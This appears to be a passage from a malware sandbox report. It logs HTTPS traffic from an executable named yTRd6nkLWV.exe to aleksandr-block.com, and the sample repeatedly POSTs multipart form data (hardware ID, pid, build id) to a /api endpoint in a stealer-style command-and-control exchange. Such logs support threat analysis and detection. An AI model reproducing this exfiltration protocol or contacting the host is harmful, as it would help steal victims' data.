                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dnvW8EF4rzc%2FIWPNedXNTB%2BYNjXYtPxW%2FT32IKPEkHMoMvFuoDRjSFXjzccY3MfN8C6RnCKma4cnn51A0uW0fGuT2UIMGeg8C16TYT%2B20uPk84immm0KJPWjQ5oEyzRZOtZ88qmx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c1079aeeec477-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1835&min_rtt=1695&rtt_var=735&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=948&delivery_rate=1722713&cwnd=182&unsent_bytes=0&cid=fc3853ac7c239431&ts=498&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC242INData Raw: 31 34 38 32 0d 0a 52 51 4e 53 4c 70 50 58 2b 42 6c 6d 2f 36 74 46 38 71 79 48 4f 58 32 2f 46 79 59 49 39 48 59 6a 6e 4e 76 74 74 58 6e 53 66 64 59 2b 49 53 51 4d 71 65 50 55 4f 78 57 61 69 58 2b 47 33 76 4a 63 55 5a 31 32 51 69 72 4f 45 45 4c 77 71 49 69 5a 57 36 51 51 39 48 39 6c 4d 30 4c 67 73 74 51 37 41 34 65 4a 66 36 6e 58 70 56 77 54 6e 53 30 45 62 5a 34 55 51 76 43 35 6a 4e 34 57 6f 68 47 31 4c 57 38 31 52 76 61 30 6e 48 67 4b 6b 73 34 67 6c 38 33 74 56 78 54 53 66 30 73 71 32 46 52 47 35 76 6e 58 6c 7a 53 33 43 62 63 49 59 69 46 46 73 61 72 55 59 6b 53 61 78 57 66 49 6a 75 5a 63 48 39 4e 78 51 6d 4f 63 48 6b 76 34 75 49 6e 66 43 62 73 62 76 69 31 68 4e 6b 66 38 76 59 68 31 41 4a 58 46 4a 70 33 4e 70 52 56 66
                                                                                                                                                                                                                                                  Data Ascii: 1482RQNSLpPX+Blm/6tF8qyHOX2/FyYI9HYjnNvttXnSfdY+ISQMqePUOxWaiX+G3vJcUZ12QirOEELwqIiZW6QQ9H9lM0LgstQ7A4eJf6nXpVwTnS0EbZ4UQvC5jN4WohG1LW81Rva0nHgKks4gl83tVxTSf0sq2FRG5vnXlzS3CbcIYiFFsarUYkSaxWfIjuZcH9NxQmOcHkv4uInfCbsbvi1hNkf8vYh1AJXFJp3NpRVf
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1369INData Raw: 32 6d 30 45 4d 74 5a 48 63 2f 32 6f 6e 73 49 57 6f 42 6e 30 4f 43 38 70 44 50 61 35 32 69 4e 45 6c 63 55 70 6c 63 33 71 58 42 37 64 5a 30 74 71 6c 52 78 4a 2b 72 4f 41 32 42 53 2b 46 62 4d 76 61 44 64 44 39 72 32 63 64 41 66 64 68 32 65 58 31 71 55 44 58 2f 31 6c 52 32 6d 43 47 56 43 2b 70 73 48 4f 57 37 63 54 39 48 38 68 4e 6b 4c 77 75 4a 70 70 44 4a 62 43 49 6f 4c 46 37 46 59 53 33 58 68 4f 5a 5a 55 55 52 76 53 7a 67 4e 30 66 76 52 4b 79 4a 32 46 77 41 72 47 79 67 6a 74 63 33 65 6f 69 67 4d 6e 70 54 56 33 6e 4e 56 73 6b 6a 31 52 47 38 76 6e 58 6c 78 4f 31 48 4c 63 73 62 6a 4e 45 2b 71 65 61 61 51 4b 51 7a 44 57 57 79 2b 74 52 48 4d 39 2f 53 6d 79 56 48 55 72 33 76 49 6a 54 57 2f 35 66 73 7a 38 68 61 41 7a 51 75 4a 46 33 44 6f 72 4a 5a 34 2b 41 2f 42 73
                                                                                                                                                                                                                                                  Data Ascii: 2m0EMtZHc/2onsIWoBn0OC8pDPa52iNElcUplc3qXB7dZ0tqlRxJ+rOA2BS+FbMvaDdD9r2cdAfdh2eX1qUDX/1lR2mCGVC+psHOW7cT9H8hNkLwuJppDJbCIoLF7FYS3XhOZZUURvSzgN0fvRKyJ2FwArGygjtc3eoigMnpTV3nNVskj1RG8vnXlxO1HLcsbjNE+qeaaQKQzDWWy+tRHM9/SmyVHUr3vIjTW/5fsz8haAzQuJF3DorJZ4+A/Bs
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1369INData Raw: 6d 79 5a 47 55 32 2b 39 38 2f 51 41 2f 42 48 39 41 31 69 4a 45 2f 37 39 36 39 34 43 70 50 4f 4d 64 44 52 71 30 4a 66 32 6e 6b 45 4d 74 59 5a 51 50 61 2f 6e 64 67 57 73 78 47 36 4b 47 51 2f 52 50 47 31 6c 33 34 41 6c 73 49 6b 6e 63 72 33 55 52 2f 56 63 45 56 67 6e 46 51 50 76 72 36 58 6c 30 50 77 4c 71 4d 73 49 77 56 50 2f 37 75 64 62 55 53 43 68 7a 37 51 79 65 6b 62 52 35 31 34 54 47 2b 54 47 30 44 30 74 34 72 64 46 37 67 52 74 7a 56 75 4e 45 7a 39 76 5a 42 32 43 70 6e 42 4c 70 76 46 34 31 73 65 31 7a 55 4b 4b 70 45 4d 41 61 62 35 75 39 41 58 76 52 44 32 45 6d 49 2b 51 76 61 6a 32 6d 52 4b 68 49 6b 67 6e 49 36 39 47 78 50 55 64 55 39 67 6b 68 52 47 38 37 79 4d 30 42 69 39 47 4c 34 70 5a 6a 52 41 2b 4c 69 63 65 77 4f 5a 7a 44 57 56 78 2b 6c 58 58 35 4d 31
                                                                                                                                                                                                                                                  Data Ascii: myZGU2+98/QA/BH9A1iJE/79694CpPOMdDRq0Jf2nkEMtYZQPa/ndgWsxG6KGQ/RPG1l34AlsIkncr3UR/VcEVgnFQPvr6Xl0PwLqMsIwVP/7udbUSChz7QyekbR514TG+TG0D0t4rdF7gRtzVuNEz9vZB2CpnBLpvF41se1zUKKpEMAab5u9AXvRD2EmI+Qvaj2mRKhIkgnI69GxPUdU9gkhRG87yM0Bi9GL4pZjRA+LicewOZzDWVx+lXX5M1
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1369INData Raw: 70 59 76 72 36 44 6c 30 50 77 46 72 30 31 62 7a 35 46 2f 4c 4f 53 66 41 71 51 77 69 47 62 79 65 4a 64 45 74 56 34 51 57 6d 58 45 45 76 73 75 6f 54 64 46 72 70 66 2b 6d 64 6d 4b 41 79 70 39 62 31 33 4c 59 33 53 4e 59 61 4f 2b 68 55 47 6e 58 4a 49 4b 73 35 55 51 76 47 77 67 4e 38 54 76 78 43 77 4b 57 63 32 51 66 53 36 6b 47 6b 4d 6b 38 51 73 6e 38 58 33 57 78 4c 5a 65 55 42 69 6e 52 34 42 73 50 6d 49 7a 31 76 6f 58 34 45 71 62 6a 42 50 35 2f 57 46 4e 52 33 64 7a 69 76 51 6c 71 56 58 45 64 31 36 53 47 61 64 48 45 44 79 74 34 6a 53 45 72 67 58 70 69 5a 6c 4f 45 33 2f 75 70 74 2f 41 5a 6a 4e 49 4a 54 49 36 68 74 52 6e 58 4a 63 4b 73 35 55 62 74 6d 4d 7a 66 59 68 38 41 44 36 50 69 45 33 51 4c 48 74 32 6e 63 48 6b 63 45 6f 6c 73 66 70 55 52 62 57 65 55 39 75 6d
                                                                                                                                                                                                                                                  Data Ascii: pYvr6Dl0PwFr01bz5F/LOSfAqQwiGbyeJdEtV4QWmXEEvsuoTdFrpf+mdmKAyp9b13LY3SNYaO+hUGnXJIKs5UQvGwgN8TvxCwKWc2QfS6kGkMk8Qsn8X3WxLZeUBinR4BsPmIz1voX4EqbjBP5/WFNR3dzivQlqVXEd16SGadHEDyt4jSErgXpiZlOE3/upt/AZjNIJTI6htRnXJcKs5UbtmMzfYh8AD6PiE3QLHt2ncHkcEolsfpURbWeU9um
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC909INData Raw: 32 6a 74 59 64 6f 68 69 39 4e 57 38 39 51 2f 6d 39 6b 33 6f 41 6d 4d 51 68 6e 4d 54 6b 58 42 48 54 66 51 51 6b 31 68 4e 5a 76 75 48 50 39 67 75 72 44 61 49 71 51 44 31 44 73 61 72 55 59 6b 53 61 78 57 66 49 6a 75 78 4a 47 39 42 6e 54 57 32 59 47 30 4c 73 75 49 4c 63 43 62 63 51 73 43 42 74 4e 6b 50 33 74 4a 39 78 43 4a 72 4d 4c 4a 2f 43 70 52 56 66 32 6d 30 45 4d 74 59 36 53 75 32 75 6a 4e 6b 51 70 67 54 30 4f 43 38 70 44 50 61 35 32 69 4e 45 6e 73 49 73 6c 4d 37 70 57 78 76 51 64 56 5a 6c 6b 52 4e 49 39 61 75 46 30 42 79 37 46 37 38 6f 5a 79 4a 41 2f 36 65 66 61 52 62 64 68 32 65 58 31 71 55 44 58 2b 74 79 56 48 71 56 56 6e 44 6f 75 70 6e 63 46 72 78 66 71 32 6c 34 63 45 76 39 39 63 49 37 41 70 4c 41 4a 4a 2f 50 37 46 63 53 32 48 78 42 61 35 41 51 53 2f
                                                                                                                                                                                                                                                  Data Ascii: 2jtYdohi9NW89Q/m9k3oAmMQhnMTkXBHTfQQk1hNZvuHP9gurDaIqQD1DsarUYkSaxWfIjuxJG9BnTW2YG0LsuILcCbcQsCBtNkP3tJ9xCJrMLJ/CpRVf2m0EMtY6Su2ujNkQpgT0OC8pDPa52iNEnsIslM7pWxvQdVZlkRNI9auF0By7F78oZyJA/6efaRbdh2eX1qUDX+tyVHqVVnDoupncFrxfq2l4cEv99cI7ApLAJJ/P7FcS2HxBa5AQS/
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1369INData Raw: 33 35 31 32 0d 0a 45 32 52 76 57 32 6b 33 67 44 6c 4d 38 73 6b 38 54 71 58 42 6e 5a 64 55 39 74 6d 42 4a 45 39 62 44 50 6d 56 75 33 42 2f 52 2f 49 52 5a 76 34 36 65 6f 64 51 65 47 69 54 6a 65 31 36 56 63 45 35 30 74 42 47 47 65 47 31 50 37 73 49 66 54 45 72 41 62 76 69 70 6d 4d 45 6e 38 73 4a 35 31 41 4a 72 4a 4b 35 2f 4a 37 56 51 62 33 58 6f 45 4a 4e 59 54 57 62 37 68 7a 2f 63 51 70 6a 36 36 4c 48 4e 77 55 37 2b 73 32 6e 77 49 33 5a 46 6e 6e 73 66 6b 55 78 48 52 66 55 42 34 6c 68 39 49 38 62 69 41 31 78 69 78 46 62 77 31 5a 7a 42 48 2b 62 4b 53 66 77 71 50 79 43 6a 51 67 4b 56 63 42 35 30 74 42 46 75 41 45 30 62 78 2b 36 62 51 41 4c 45 56 74 79 78 74 63 46 4f 2f 72 4e 70 38 43 4e 32 52 5a 35 33 43 36 46 38 4e 30 58 56 45 59 35 45 65 55 2f 47 32 67 74 51
                                                                                                                                                                                                                                                  Data Ascii: 3512E2RvW2k3gDlM8sk8TqXBnZdU9tmBJE9bDPmVu3B/R/IRZv46eodQeGiTje16VcE50tBGGeG1P7sIfTErAbvipmMEn8sJ51AJrJK5/J7VQb3XoEJNYTWb7hz/cQpj66LHNwU7+s2nwI3ZFnnsfkUxHRfUB4lh9I8biA1xixFbw1ZzBH+bKSfwqPyCjQgKVcB50tBFuAE0bx+6bQALEVtyxtcFO/rNp8CN2RZ53C6F8N0XVEY5EeU/G2gtQ
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1369INData Raw: 6a 56 67 4f 6b 44 77 73 70 31 77 46 70 62 62 4c 4a 6a 4e 36 31 4d 57 33 58 74 45 61 35 73 55 41 62 44 35 69 4d 39 62 36 46 2b 52 42 48 59 6d 52 72 4f 57 6a 57 30 4f 6d 73 55 78 6d 38 2f 6d 54 52 4c 4e 4e 51 6f 71 68 78 4e 51 76 75 47 5a 78 77 79 33 41 50 6f 2b 49 54 64 41 73 65 33 61 63 41 75 54 78 43 79 55 78 2b 42 54 48 4e 68 77 54 6d 61 61 46 55 6e 33 73 34 72 53 48 62 6f 63 75 69 68 67 50 45 6a 34 75 35 4d 37 53 74 33 4f 50 39 43 57 70 57 30 50 32 6d 31 4a 65 74 51 6d 51 75 2b 6f 6d 74 6f 4c 74 6c 32 62 4a 47 30 7a 53 66 61 6c 32 6d 52 4b 68 49 6b 67 6e 49 36 39 47 78 2f 5a 65 55 64 74 6d 42 74 4d 38 62 36 45 32 42 47 2b 44 62 73 69 61 54 78 45 2f 4b 65 51 63 52 61 55 77 43 71 65 78 76 64 59 58 35 4d 31 51 33 4c 57 54 41 48 4d 73 34 7a 62 44 62 30 51
                                                                                                                                                                                                                                                  Data Ascii: jVgOkDwsp1wFpbbLJjN61MW3XtEa5sUAbD5iM9b6F+RBHYmRrOWjW0OmsUxm8/mTRLNNQoqhxNQvuGZxwy3APo+ITdAse3acAuTxCyUx+BTHNhwTmaaFUn3s4rSHbocuihgPEj4u5M7St3OP9CWpW0P2m1JetQmQu+omtoLtl2bJG0zSfal2mRKhIkgnI69Gx/ZeUdtmBtM8b6E2BG+DbsiaTxE/KeQcRaUwCqexvdYX5M1Q3LWTAHMs4zbDb0Q
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1369INData Raw: 42 35 38 72 75 55 66 42 4b 4d 68 41 61 64 78 65 6c 57 45 4e 59 31 43 69 71 51 56 42 6d 75 39 38 2f 54 43 76 42 48 35 48 55 36 5a 52 2b 6d 35 63 68 6b 53 6f 53 4a 4d 64 43 57 74 78 56 66 7a 7a 55 63 4b 74 45 58 55 2b 79 2f 6a 4d 45 59 39 79 47 4b 42 48 59 6d 52 75 72 33 76 48 77 56 6c 4e 38 71 67 76 44 62 64 52 4c 63 64 6b 6f 6f 70 77 4a 4d 37 72 71 4b 30 43 57 4f 45 62 4d 7a 5a 6a 35 4b 38 66 58 55 4f 77 76 64 6b 52 37 51 68 71 56 6b 55 5a 31 74 42 44 4c 57 49 55 4c 77 74 34 6a 42 43 76 30 38 6f 7a 46 72 4b 77 37 58 73 6f 74 79 45 70 44 62 5a 39 36 4f 34 78 74 48 6a 54 73 45 62 6f 64 55 47 61 37 72 31 49 4a 49 35 30 2f 6d 4f 43 38 70 44 4f 66 31 77 69 6c 4b 33 64 74 6e 79 49 36 69 57 41 33 50 63 30 64 38 6c 56 4e 2f 77 4a 6d 45 77 52 71 39 46 4c 67 5a 58
                                                                                                                                                                                                                                                  Data Ascii: B58ruUfBKMhAadxelWENY1CiqQVBmu98/TCvBH5HU6ZR+m5chkSoSJMdCWtxVfzzUcKtEXU+y/jMEY9yGKBHYmRur3vHwVlN8qgvDbdRLcdkoopwJM7rqK0CWOEbMzZj5K8fXUOwvdkR7QhqVkUZ1tBDLWIULwt4jBCv08ozFrKw7XsotyEpDbZ96O4xtHjTsEbodUGa7r1IJI50/mOC8pDOf1wilK3dtnyI6iWA3Pc0d8lVN/wJmEwRq9FLgZX
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1369INData Raw: 6e 68 54 55 64 33 64 39 6e 79 4a 79 72 47 77 32 64 4c 51 51 74 6c 51 5a 54 2b 4c 71 5a 31 46 79 4f 49 59 45 6b 62 7a 35 4c 35 34 43 5a 61 67 65 64 77 68 6d 75 37 2b 74 51 47 4e 46 6a 65 6c 53 6a 46 30 2f 77 76 70 6e 47 57 2f 35 66 75 32 63 35 43 51 79 35 39 61 55 31 52 49 57 4a 66 39 44 37 35 6c 55 52 32 6d 4e 56 4a 36 4d 58 55 50 32 35 68 4a 64 56 38 42 6e 30 66 7a 4e 2b 44 50 57 6b 32 69 4e 55 7a 35 4a 79 77 35 6d 31 43 51 43 54 62 41 52 38 31 6b 77 54 73 50 6d 64 6c 30 50 77 57 4c 63 31 63 7a 5a 50 35 37 62 64 52 54 71 37 79 69 43 57 7a 65 74 4d 44 70 39 61 52 32 47 61 47 45 62 6f 68 37 48 43 47 4c 34 52 73 7a 46 77 63 41 4b 78 75 74 6f 6a 50 64 33 59 4c 5a 65 43 72 52 63 4f 7a 6e 74 50 66 4a 46 55 66 72 44 35 6c 35 64 44 38 43 71 33 4b 57 38 33 57 75
                                                                                                                                                                                                                                                  Data Ascii: nhTUd3d9nyJyrGw2dLQQtlQZT+LqZ1FyOIYEkbz5L54CZagedwhmu7+tQGNFjelSjF0/wvpnGW/5fu2c5CQy59aU1RIWJf9D75lUR2mNVJ6MXUP25hJdV8Bn0fzN+DPWk2iNUz5Jyw5m1CQCTbAR81kwTsPmdl0PwWLc1czZP57bdRTq7yiCWzetMDp9aR2GaGEboh7HCGL4RszFwcAKxutojPd3YLZeCrRcOzntPfJFUfrD5l5dD8Cq3KW83Wu


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.749812188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:34 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=RC6TGEQHH2SEL
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 12812
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:34 UTC12812OUTData Raw: 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 52 43 36 54 47 45 51 48 48 32 53 45 4c
                                                                                                                                                                                                                                                  Data Ascii: --RC6TGEQHH2SELContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--RC6TGEQHH2SELContent-Disposition: form-data; name="pid"2--RC6TGEQHH2SELContent-Disposition: form-data; name="lid"BbL7Kk--04S--RC6TGEQHH2SEL
                                                                                                                                                                                                                                                  2025-01-14 07:55:35 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=cent8m77v67f1kkqtr9n46al2a; expires=Sat, 10 May 2025 01:42:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CR9thD4YJXzTeHmkyGNXRJkDLzFQ7W9MT9tY9MDspRGzdnw8pTqVstv%2B3r12Y24rUzWvYN%2F9ULFD%2FNEcs6P%2FsuPdCXi47oG8xagpKD3KaLxzQWCdZcrHg6jG05eOBo8utyRfbnTF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c10832895439f-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1545&rtt_var=593&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13750&delivery_rate=1822721&cwnd=241&unsent_bytes=0&cid=5c4b70f3f9f57844&ts=820&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-14 07:55:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.749825188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:35 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=URVIBBBZEWIGER
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 15050
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:35 UTC15050OUTData Raw: 2d 2d 55 52 56 49 42 42 42 5a 45 57 49 47 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 55 52 56 49 42 42 42 5a 45 57 49 47 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 52 56 49 42 42 42 5a 45 57 49 47 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 55 52 56 49 42 42 42 5a 45 57
                                                                                                                                                                                                                                                  Data Ascii: --URVIBBBZEWIGERContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--URVIBBBZEWIGERContent-Disposition: form-data; name="pid"2--URVIBBBZEWIGERContent-Disposition: form-data; name="lid"BbL7Kk--04S--URVIBBBZEW
                                                                                                                                                                                                                                                  2025-01-14 07:55:36 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=shnma8aio03pmgmvpv8fs0otac; expires=Sat, 10 May 2025 01:42:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvLuvZ0sLIEBp%2BQ0jRuWbsRFy6d8YH1UfCtCNDMbUSarfCdSf3%2BjDswvr6%2Ft3%2BzJKrycxbntHOLwGQx%2BA0FsoDcpYNPud72xwQZu3iUIz%2Brce9wmVTbwKvHIjOQfGrLogjTZyjU2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c108cff967d02-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1972&rtt_var=754&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15989&delivery_rate=1437007&cwnd=230&unsent_bytes=0&cid=59ea599b3508e224&ts=546&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-14 07:55:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.749838188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:37 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=F18QAAKN
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 20339
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:37 UTC15331OUTData Raw: 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 46 31 38 51 41 41 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: --F18QAAKNContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--F18QAAKNContent-Disposition: form-data; name="pid"3--F18QAAKNContent-Disposition: form-data; name="lid"BbL7Kk--04S--F18QAAKNContent-Dispositio
